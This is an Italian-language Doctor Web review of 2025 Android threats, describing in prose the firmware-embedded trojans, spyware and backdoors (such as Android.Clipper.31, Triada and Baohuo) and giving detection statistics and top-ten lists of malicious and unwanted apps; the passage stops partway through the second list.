&lt;p&gt;Ad aprile dell'anno passato gli esperti Doctor Web &lt;a href="https://news.drweb-av.it/show/?i=15002" target="_blank"&gt;hanno individuato&lt;/a&gt; una campagna per il furto di criptovalute ai proprietari di dispositivi Android. I malintenzionati hanno ottenuto l'accesso alla catena di fornitura di una serie di produttori cinesi e hanno incorporato nel firmware di alcuni modelli di smartphone economici un programma trojan, &lt;a href="https://vms.drweb-av.it/search/?q=Android.Clipper.31&amp;lng=it"&gt;&lt;b&gt;Android.Clipper.31&lt;/b&gt;&lt;/a&gt;. Gli attori di minacce l'hanno integrato in una versione modificata dell'app di messaggistica istantanea WhatsApp. Per la modifica è stato utilizzato lo strumento &lt;a href="https://github.com/LSPosed/LSPatch" target="_blank"&gt;LSPatch&lt;/a&gt;, che permette di cambiare la logica di funzionamento di applicazioni senza modificare il loro codice.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Android.Clipper.31&amp;lng=it"&gt;&lt;b&gt;Android.Clipper.31&lt;/b&gt;&lt;/a&gt; intercetta i messaggi inviati e ricevuti nell'app di messaggistica, cerca in essi gli indirizzi di portafogli delle criptovalute Tron ed Ethereum, e li sostituisce con gli indirizzi appartenenti agli attaccanti. Allo stesso tempo, il trojan occulta la sostituzione furtiva, e in tali messaggi alle vittime vengono visualizzati i portafogli corretti. &lt;a href="https://vms.drweb-av.it/search/?q=Android.Clipper.31&amp;lng=it"&gt;&lt;b&gt;Android.Clipper.31&lt;/b&gt;&lt;/a&gt; inoltre invia ai malintenzionati tutte le immagini in formato &lt;em&gt;jpg&lt;/em&gt;, &lt;em&gt;png&lt;/em&gt; e &lt;em&gt;jpeg&lt;/em&gt; per la ricerca in esse delle frasi mnemoniche salvate che consentono di ottenere l'accesso ai portafogli crypto. I cybercriminali hanno incorporato &lt;a href="https://vms.drweb-av.it/search/?q=Android.Clipper.31&amp;lng=it"&gt;&lt;b&gt;Android.Clipper.31&lt;/b&gt;&lt;/a&gt; anche in decine di altri programmi, tra cui erano popolari applicazioni di portafoglio crypto, scanner di codici QR e altre app di messaggistica, incluso Telegram. Queste varianti venivano distribuite attraverso siti malevoli.&lt;/p&gt;

&lt;p&gt;Nel 2025 venivano registrati anche altri casi di infiltrazione di malware nell'area di sistema di dispostivi Android. Ad esempio, un altro gruppo di malintenzionati è riuscito a integrare nuove versioni dei pericolosi trojan &lt;a href="https://vms.drweb-av.it/search/?q=Android.Triada&amp;lng=it"&gt;&lt;b&gt;Android.Triada&lt;/b&gt;&lt;/a&gt; nel firmware di una serie di smartphone economici. I malware Triada sono pericolosi per la loro capacità di infettare il processo di sistema Zygote. Quest'ultimo partecipa direttamente all'avvio di tutte le applicazioni nel sistema, pertanto, anche i trojan Triada successivamente possono integrarsi in qualsiasi app sul dispositivo, in effetti ottenendone il completo controllo. I malintenzionati utilizzano questi trojan per scaricare e installare altri programmi malevoli, nonché applicazioni indesiderate e pubblicitarie. Oltre a ciò, tramite di essi, loro possono spiare le vittime, abbonarle a servizi a pagamento ecc. Sono stati rilevati anche nuovi casi di infezione dei firmware di TV box su base Android da nuove versioni del trojan &lt;a href="https://vms.drweb-av.it/search/?q=Android.Vo1d&amp;lng=it"&gt;&lt;b&gt;Android.Vo1d&lt;/b&gt;&lt;/a&gt;, che la nostra azienda &lt;a href="https://news.drweb-av.it/show/?i=14900" target="_blank"&gt;ha scoperto&lt;/a&gt; nel 2024. Vo1d rappresenta un backdoor che colloca i propri componenti nell'area di sistema dei dispositivi infetti e su comando degli attaccanti è in grado di scaricare e installare di nascosto software di terze parti.&lt;/p&gt;

&lt;p&gt;Inoltre, ad aprile il nostro laboratorio antivirus &lt;a href="https://news.drweb-av.it/show/?i=15006" target="_blank"&gt;ha registrato&lt;/a&gt; una campagna per la distribuzione di un trojan spia, &lt;a href="https://vms.drweb-av.it/search/?q=Android.Spy.1292.origin&amp;lng=it"&gt;&lt;b&gt;Android.Spy.1292.origin&lt;/b&gt;&lt;/a&gt;, mirato ai militari russi. I malintenzionati hanno integrato il malware in una delle versioni del software cartografico Alpine Quest e distribuivano la mod tramite un canale Telegram da loro creato, spacciato per quello ufficiale, nonché tramite uno degli store di app Android russi.&lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/january/review_mobile/01_Android.Spy.1292.origin_tg_group_2025.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/january/review_mobile/01_Android.Spy.1292.origin_tg_group_2025.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;Canale Telegram attraverso cui i malintenzionati distribuivano la mod di Alpine Quest malevola contenente &lt;b&gt;Android.Spy.1292.origin&lt;/b&gt;&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Android.Spy.1292.origin&amp;lng=it"&gt;&lt;b&gt;Android.Spy.1292.origin&lt;/b&gt;&lt;/a&gt; trasmetteva ai cybercriminali dati sugli account e sul numero di cellulare, i contatti dalla rubrica, la geolocalizzazione del dispositivo infetto ed informazioni sui file in esso memorizzati. Il trojan era in grado di rubare determinati file su comando degli attaccanti. A loro interessavano documenti riservati che gli utenti inviavano tramite popolari servizi di messaggistica, nonché il file di log delle localizzazioni dell'app Alpine Quest.&lt;/p&gt;

&lt;p&gt;Ad agosto &lt;a href="https://news.drweb-av.it/show/?i=15047" target="_blank"&gt;abbiamo riferito&lt;/a&gt; casi di distribuzione di un backdoor, &lt;a href="https://vms.drweb-av.it/search/?q=Android.Backdoor.916.origin&amp;lng=it"&gt;&lt;b&gt;Android.Backdoor.916.origin&lt;/b&gt;&lt;/a&gt; tramite messaggi privati nelle popolari app di messaggistica. Gli attaccanti suggerivano alle potenziali vittime di installare un "antivirus" dal file APK allegato ai messaggi, in cui in realtà era nascosto il programma malevolo. Il nostro laboratorio antivirus ha scoperto le prime versioni di &lt;a href="https://vms.drweb-av.it/search/?q=Android.Backdoor.916.origin&amp;lng=it"&gt;&lt;b&gt;Android.Backdoor.916.origin&lt;/b&gt;&lt;/a&gt; a gennaio 2025 e da quel momento seguiva la sua attività, il che ha permesso di individuare prontamente questa campagna.&lt;/p&gt;

&lt;div class="img img-two-v same-height mb-3"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/january/review_mobile/02_Android.Backdoor.916.origin_2025.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/january/review_mobile/02_Android.Backdoor.916.origin_2025.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/january/review_mobile/03_Android.Backdoor.916.origin_2025.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/january/review_mobile/03_Android.Backdoor.916.origin_2025.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;&lt;b&gt;Android.Backdoor.916.origin&lt;/b&gt; trae in inganno gli utenti imitando il funzionamento di un antivirus&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Dopo l'installazione sul dispositivo Android, &lt;a href="https://vms.drweb-av.it/search/?q=Android.Backdoor.916.origin&amp;lng=it"&gt;&lt;b&gt;Android.Backdoor.916.origin&lt;/b&gt;&lt;/a&gt; consente di rubare informazioni confidenziali e spiare l'utente. Ad esempio, tramite il backdoor i malintenzionati possono ascoltare conversazioni, trasmettere la trasmissione dalla videocamera, tracciare la posizione e rubare il contenuto dalle app di messaggistica e dal browser. Oltre a questo, &lt;a href="https://vms.drweb-av.it/search/?q=Android.Backdoor.916.origin&amp;lng=it"&gt;&lt;b&gt;Android.Backdoor.916.origin&lt;/b&gt;&lt;/a&gt; realizza la funzionalità di keylogger per l'intercettazione dei testi digitati, incluse password. Secondo le valutazioni dei nostri specialisti, il backdoor viene impiegato in attacchi mirati e non è destinato alla distribuzione di massa. L'obiettivo principale per i cybercriminali sono i dipendenti di aziende russe.&lt;/p&gt;

&lt;p&gt;Ad ottobre Doctor Web &lt;a href="https://news.drweb-av.it/show/?i=15076" target="_blank"&gt;ha pubblicato&lt;/a&gt; informazioni sul backdoor multifunzionale &lt;a href="https://vms.drweb-av.it/search/?q=Android.Backdoor.Baohuo.1.origin&amp;lng=it"&gt;&lt;b&gt;Android.Backdoor.Baohuo.1.origin&lt;/b&gt;&lt;/a&gt;, che i nostri analisti dei virus hanno scoperto in versioni modificate del programma di messaggistica Telegram X. La principale fonte della sua diffusione sono stati siti malevoli, su cui le potenziali vittime finiscono attraverso la pubblicità in applicazioni mobili. Su questi siti agli utenti viene proposto di installare Telegram X, presumibilmente per cercare partner per la comunicazione e gli incontri. Tali risorse internet sono orientati in maggiore misura agli abitanti di Indonesia e Brasile. Allo stesso tempo, abbiano rilevato questo backdoor anche in una serie di store di app Android di terze parti.&lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/january/review_mobile/04_Android.Backdoor.Baohuo.1.origin_website_2025.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/january/review_mobile/04_Android.Backdoor.Baohuo.1.origin_website_2025.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;Esempio di sito malevolo da cui veniva scaricata la versione trojan di Telegram X&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Uno dei compiti di &lt;a href="https://vms.drweb-av.it/search/?q=Android.Backdoor.Baohuo.1.origin&amp;lng=it"&gt;&lt;b&gt;Android.Backdoor.Baohuo.1.origin&lt;/b&gt;&lt;/a&gt; è il furto di dati confidenziali. Ad esempio, il malware ruba il login e la password dell'account Telegram della vittima, la cronologia della corrispondenza nell'app di messaggistica, gli SMS in arrivo, i contatti dalla rubrica del dispositivo, nonché è in grado di intercettare il contenuto degli appunti. I malintenzionati lo utilizzano, però, non solo come applicazione spia. Con l'ausilio di &lt;a href="https://vms.drweb-av.it/search/?q=Android.Backdoor.Baohuo.1.origin&amp;lng=it"&gt;&lt;b&gt;Android.Backdoor.Baohuo.1.origin&lt;/b&gt;&lt;/a&gt; loro effettivamente possono gestire l'account hackerato e controllare il funzionamento di Telegram X modificando le sue funzionalità. Così, il backdoor consente di aggiungere impercettibilmente l'utente e cancellarlo da canali Telegram, entrare a suo nome in chat e nascondere i dispositivi autorizzati per il suo account. Per eseguire azioni che richiedono un intervento nella logica di funzionamento dell'applicazione, viene utilizzato il framework Xposed. I cybercriminali gestiscono il backdoor sia in un modo tradizionale: tramite il server C2, e sia inviando comandi tramite il database Redis, il che in precedenza non si riscontrava in altri programmi malevoli per SO Android. Il numero totale di dispositivi infettati da &lt;a href="https://vms.drweb-av.it/search/?q=Android.Backdoor.Baohuo.1.origin&amp;lng=it"&gt;&lt;b&gt;Android.Backdoor.Baohuo.1.origin&lt;/b&gt;&lt;/a&gt; ha superato 58.000. Sono stati interessati circa 3.000 vari modelli di smartphone, tablet, TV box e persino auto con computer di bordo basati su Android.&lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/january/review_mobile/05_Android.Backdoor.Baohuo.1.origin_map_en_2025.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/january/review_mobile/05_Android.Backdoor.Baohuo.1.origin_map_en_2025.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;Paesi con il maggior numero di dispositivi infettati da &lt;b&gt;Android.Backdoor.Baohuo.1.origin&lt;/b&gt;&lt;/em&gt;&lt;/p&gt;

&lt;h3&gt;Statistiche&lt;/h3&gt;

&lt;p&gt;Secondo i dati della statistica di rilevamento di Dr.Web Security Space per dispositivi mobili, nel 2025 le minacce Android più diffuse sono stati i vari programmi malevoli: gli utenti li affrontavano nell'81,11% dei casi. Dopo di essi, con una quota del 10,73%, si sono posizionate le applicazioni potenzialmente pericolose. La terza posizione è occupata dai programmi pubblicitari, che venivano rilevati nel 5,89% dei casi. L'attività più bassa si osservava da parte dei software indesiderati: rappresentano il 2,27% dei rilevamenti.&lt;/p&gt;

&lt;p&gt;Rispetto all'anno prima, la quota dei programmi malevoli e potenzialmente pericolosi è cresciuta, mentre la quota dei software indesiderati e pubblicitari è diminuita.&lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/january/review_mobile/06_2025_threat_type_en.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/january/review_mobile/06_2025_threat_type_en.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;p&gt;&lt;b&gt;Applicazioni malevole&lt;/b&gt;&lt;/p&gt;

&lt;p&gt;Da più anni i trojan pubblicitari della famiglia &lt;a href="https://vms.drweb-av.it/search/?q=Android.HiddenAds&amp;lng=it"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt; rimangono leader per numero di rilevamenti. Nel 2025 la situazione è rimasta la stessa, tuttavia, nei 12 mesi passati la loro quota è diminuita leggermente dal 31,95% al 27,42%.&lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/january/review_mobile/07_Android.HiddenAds_dynamics_2025_en.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/january/review_mobile/07_Android.HiddenAds_dynamics_2025_en.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;p&gt;Questi trojan visualizzano fastidiose pubblicità sotto forma di banner e video a schermo intero. Per rendere più difficile per gli utenti il rilevamento e la rimozione dai dispositivi infetti dei programmi malevoli, dopo l'installazione questi ultimi cercano di "nascondersi", ad esempio, nascondendo o sostituendo le proprie icone nel menu della schermata principale.&lt;/p&gt;

&lt;p&gt;Il rappresentante più attivo della famiglia si è rivelato &lt;a href="https://vms.drweb-av.it/search/?q=Android.HiddenAds&amp;lng=it"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.657.origin&lt;/b&gt; che rappresenta oltre un terzo di tutti i rilevamenti. Il trojan era stato avvistato dai nostri analisti dei virus nel 2024, e durante questo periodo è diventato leader. Rappresenta una delle molteplici varianti di &lt;a href="https://vms.drweb-av.it/search/?q=Android.HiddenAds&amp;lng=it"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1994&lt;/b&gt;, un programma malevolo conosciuto dal 2021. Si sono diffuse anche alcune sue nuove versioni, ad esempio, &lt;a href="https://vms.drweb-av.it/search/?q=Android.HiddenAds&amp;lng=it"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.666.origin&lt;/b&gt; e &lt;a href="https://vms.drweb-av.it/search/?q=Android.HiddenAds&amp;lng=it"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.673.origin&lt;/b&gt;. Non si può escludere che con il tempo esse anche possono salire in cima alla statistica, come è accaduto in precedenza con altre varianti di &lt;a href="https://vms.drweb-av.it/search/?q=Android.HiddenAds&amp;lng=it"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1994&lt;/b&gt;.&lt;/p&gt;

&lt;p&gt;Durante l'anno, gli utenti di nuovo affrontavano il sottofamiglia &lt;a href="https://vms.drweb-av.it/search/?q=Android.HiddenAds&amp;lng=it"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt;, Aegis, tuttavia, la quota di tali programmi malevoli del totale di rilevamenti della famiglia è diminuita notevolmente dal 17,37% al 3,11%. Questi trojan si distinguono, tra l'altro, per loro la capacità di avviarsi automaticamente dopo l'installazione. Tra di essi sono state le più attive le varianti &lt;a href="https://vms.drweb-av.it/search/?q=Android.HiddenAds.Aegis&amp;lng=it"&gt;&lt;b&gt;Android.HiddenAds.Aegis&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1&lt;/b&gt; e &lt;a href="https://vms.drweb-av.it/search/?q=Android.HiddenAds.Aegis&amp;lng=it"&gt;&lt;b&gt;Android.HiddenAds.Aegis&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.8.origin&lt;/b&gt;.&lt;/p&gt;

&lt;p&gt;I software malevoli secondi per diffusione si sono rivelati i trojan pubblicitari &lt;a href="https://vms.drweb-av.it/search/?q=Android.MobiDash&amp;lng=it"&gt;&lt;b&gt;Android.MobiDash&lt;/b&gt;&lt;/a&gt; la cui quota, rispetto al 2024, è salita dal 5,38% al 15,64%. Il leader tra di essi era &lt;a href="https://vms.drweb-av.it/search/?q=Android.MobiDash&amp;lng=it"&gt;&lt;b&gt;Android.MobiDash&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.7859&lt;/b&gt;. Dopo di essi si sono posizionati i programmi falsificazione &lt;a href="https://vms.drweb-av.it/search/?q=Android.FakeApp&amp;lng=it"&gt;&lt;b&gt;Android.FakeApp&lt;/b&gt;&lt;/a&gt;, che vengono utilizzati per scopi fraudolenti, e invece di fornire le funzionalità promesse, caricano vari siti. Hanno rappresentato il 10,94% dei rilevamenti. È un indicatore inferiore rispetto al 2024 quando la loro quota ammontava al 18,28%. Tale diminuzione è avvenuta, tra l'altro, anche a causa di a una minore attività del trojan &lt;a href="https://vms.drweb-av.it/search/?q=Android.FakeApp&amp;lng=it"&gt;&lt;b&gt;Android.FakeApp&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1600&lt;/b&gt;, tuttavia, esso rimane ancora il rappresentante più diffuso della famiglia. Il suo compito principale è caricare siti di casinò online.&lt;/p&gt;

&lt;p&gt;La quota dei programmi trojan della famiglia &lt;a href="https://vms.drweb-av.it/search/?q=Android.Spy&amp;lng=it"&gt;&lt;b&gt;Android.Spy&lt;/b&gt;&lt;/a&gt;, che realizzano varie funzionalità spia, si è ridotta dall'11,52% al 3,09%. Allo stesso tempo, è aumentata l'attività dei trojan bancari. La loro quota del numero totale di rilevamenti delle applicazioni malevole ha raggiunto il 6,94% contro l'indicatore del 6,29% l'anno prima.&lt;/p&gt;

&lt;p&gt;Nel 2025 dal 5,49% al 6,01% è aumentato il numero di rilevamenti dei packer software, che possono utilizzare, tra l'altro, anche i malintenzionati al fine di proteggere malware dal rilevamento e analisi. Il più spesso sui dispositivi protetti venivano rilevati i programmi malevoli con il packer &lt;a href="https://vms.drweb-av.it/search/?q=Android.Packed&amp;lng=it"&gt;&lt;b&gt;Android.Packed&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.57146&lt;/b&gt;.&lt;/p&gt;

&lt;p&gt;Si sono diffuse varie mod malevole dell'applicazione di messaggistica WhatsApp. Tra di esse erano varianti (rilevate da Dr.Web come &lt;a href="https://vms.drweb-av.it/search/?q=Android.Click&amp;lng=it"&gt;&lt;b&gt;Android.Click&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1812&lt;/b&gt;) che caricano siti web impercettibilmente per le vittime. Inoltre, si osservava un'attività aumentata dei trojan multifunzionali della famiglia &lt;a href="https://vms.drweb-av.it/search/?q=Android.Triada&amp;lng=it"&gt;&lt;b&gt;Android.Triada&lt;/b&gt;&lt;/a&gt;, che i malintenzionati possono incorporare nel firmware di dispositivi Android. La loro quota è cresciuta dal 2,74% al 7,48%.&lt;/p&gt;

&lt;p&gt;Le dieci applicazioni Android malevole più frequentemente rilevate nel 2025 sono:&lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/january/review_mobile/08_2025_malware_en.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/january/review_mobile/08_2025_malware_en.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;dl&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Android.HiddenAds&amp;lng=it"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.657.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Android.HiddenAds&amp;lng=it"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.4214&lt;/b&gt;&lt;/dt&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Android.HiddenAds&amp;lng=it"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.655.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Android.HiddenAds&amp;lng=it"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.4213&lt;/b&gt;&lt;/dt&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Android.HiddenAds&amp;lng=it"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.666.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Programmi trojan per la visualizzazione di pubblicità invadenti. I campioni di questa famiglia spesso vengono distribuiti sotto le apparenze di applicazioni innocue e in alcuni casi vengono installati nella directory di sistema da altri software malevoli. Entrando su dispositivi Android, tali trojan pubblicitari di solito nascondono all'utente la propria presenza sul sistema: per esempio, nascondono l'icona dell'applicazione dal menu della schermata principale.&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Android.MobiDash&amp;lng=it"&gt;&lt;b&gt;Android.MobiDash&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.7859&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Programma trojan che visualizza annunci pubblicitari invadenti. È un modulo software che gli sviluppatori software incorporano in applicazioni.&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Android.FakeApp&amp;lng=it"&gt;&lt;b&gt;Android.FakeApp&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1600&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Programma trojan che carica il sito web specificato nelle sue impostazioni. Le varianti conosciute di questa applicazione malevola caricano un sito di casinò online.&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Android.Click&amp;lng=it"&gt;&lt;b&gt;Android.Click&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1812&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Rilevamento di mod malevole dell'applicazione di messaggistica WhatsApp, che impercettibilmente per l'utente possono caricare vari siti in modalità background.&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Android.Packed&amp;lng=it"&gt;&lt;b&gt;Android.Packed&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.57146&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Rilevamento di applicazioni malevole che sono impacchettate tramite un popolare programma di offuscamento di codice commerciale.&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Android.Triada&amp;lng=it"&gt;&lt;b&gt;Android.Triada&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.5847&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Rilevamento di un packer per i trojan della famiglia &lt;a href="https://vms.drweb-av.it/search/?q=Android.Triada&amp;lng=it"&gt;&lt;b&gt;Android.Triada&lt;/b&gt;&lt;/a&gt;, studiato per proteggerli dall'analisi e dal rilevamento. Il più delle volte i malintenzionati lo utilizzano insieme a mod malevole dell'applicazione di messaggistica Telegram, in cui questi trojan sono direttamente integrati.&lt;/dd&gt;
&lt;/dl&gt;

&lt;p&gt;&lt;b&gt;Software indesiderati&lt;/b&gt;&lt;/p&gt;

&lt;p&gt;I software indesiderati più diffusi nel 2025 di nuovo sono diventate le applicazioni &lt;a href="https://vms.drweb-av.it/search/?q=Program.FakeMoney&amp;lng=it"&gt;&lt;b&gt;Program.FakeMoney&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.11&lt;/b&gt;, che rappresentano il 51,96% dei rilevamenti. Suggeriscono agli utenti di completare determinate attività per ricompense, e presumibilmente in seguito consentirebbero di convertire il premio in denaro reale. Tuttavia, in fin dei conti non avviene alcun pagamento. Insieme a &lt;a href="https://vms.drweb-av.it/search/?q=Program.FakeMoney&amp;lng=it"&gt;&lt;b&gt;Program.FakeMoney&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.11&lt;/b&gt; si sono diffusi altri programmi simili, ad esempio: &lt;a href="https://vms.drweb-av.it/search/?q=Program.FakeMoney&amp;lng=it"&gt;&lt;b&gt;Program.FakeMoney&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.14&lt;/b&gt; e &lt;a href="https://vms.drweb-av.it/search/?q=Program.FakeMoney&amp;lng=it"&gt;&lt;b&gt;Program.FakeMoney&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.16&lt;/b&gt;, ma gli utenti li riscontravano con una frequenza notevolmente minore.&lt;/p&gt;

&lt;p&gt;Alla seconda posizione con il 10,37% si sono collocati i programmi &lt;a href="https://vms.drweb-av.it/search/?q=Program.FakeAntiVirus&amp;lng=it"&gt;&lt;b&gt;Program.FakeAntiVirus&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1&lt;/b&gt;, che imitano il funzionamento di antivirus e rilevano minacce inesistenti. Per "l'eliminazione" dell'infezione, suggeriscono di acquistare una versione di software completa.&lt;/p&gt;

&lt;p&gt;Le applicazioni &lt;a href="https://vms.drweb-av.it/search/?q=Program.CloudInject&amp;lng=it"&gt;&lt;b&gt;Program.CloudInject&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1&lt;/b&gt;, che vengono modificate nel servizio cloud CloudInject, con una quota del 6,41% sono diventate le terze per diffusione. Le loro varianti, rilevate come &lt;a href="https://vms.drweb-av.it/search/?q=Program.CloudInject&amp;lng=it"&gt;&lt;b&gt;Program.CloudInject&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.5&lt;/b&gt;, con un indicatore del 5,08% si sono collocate accanto ad esse alla quarta posizione. Le modifiche a tali programmi vengono apportate direttamente sul server remoto, mentre l'accesso al servizio viene fornito dall'utility &lt;a href="https://vms.drweb-av.it/search/?q=Tool.CloudInject&amp;lng=it"&gt;&lt;b&gt;Tool.CloudInject&lt;/b&gt;&lt;/a&gt; che è solo l'involucro per il suo uso. Durante la modifica ai programmi vengono aggiunti autorizzazioni di sistema pericolose e un codice offuscato. Inoltre, tramite il servizio CloudInject i modificatori possono gestire in remoto le applicazioni modificate, ad esempio, bloccarle e chiedere di inserire un codice per l'ulteriore utilizzo.&lt;/p&gt;

&lt;p&gt;Nel 2025 si osservava una leggera crescita del numero di rilevamenti di una serie di programmi che possono essere utilizzati per monitorare utenti e controllare la loro attività. Nelle mani dei malintenzionati, tali strumenti si trasformano in software spia. Così, la quota dell'applicazione &lt;a href="https://vms.drweb-av.it/search/?q=Program.TrackView&amp;lng=it"&gt;&lt;b&gt;Program.TrackView&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1.origin&lt;/b&gt; e della sua variante &lt;a href="https://vms.drweb-av.it/search/?q=Program.TrackView&amp;lng=it"&gt;&lt;b&gt;Program.TrackView&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.2.origin&lt;/b&gt; è aumentata rispettivamente dal 2,40% al 2,91% e dallo 0,21% allo 0,97%. La quota di &lt;a href="https://vms.drweb-av.it/search/?q=Program.SecretVideoRecorder&amp;lng=it"&gt;&lt;b&gt;Program.SecretVideoRecorder&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1.origin&lt;/b&gt; è salita dal 2,03% al 2,56%, e quella della sua variante &lt;a href="https://vms.drweb-av.it/search/?q=Program.SecretVideoRecorder&amp;lng=it"&gt;&lt;b&gt;Program.SecretVideoRecorder&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.2.origin&lt;/b&gt; dallo 0,90% all'1,02%. L'indicatore del programma &lt;b&gt;Program.SnoopPhone.1.origin&lt;/b&gt; è aumentato dallo 0,31% all'1,01%.&lt;/p&gt;

&lt;p&gt;Le dieci applicazioni indesiderate più frequentemente rilevate nel 2025 sono:&lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/january/review_mobile/09_2025_unwanted_en.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/january/review_mobile/09_2025_unwanted_en.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;dl&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Program.FakeMoney&amp;lng=it"&gt;&lt;b&gt;Program.FakeMoney&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.11&lt;/b&gt;&lt;/dt&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Program.FakeMoney&amp;lng=it"&gt;&lt;b&gt;Program.FakeMoney&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.14&lt;/b&gt;&lt;/dt&gt;
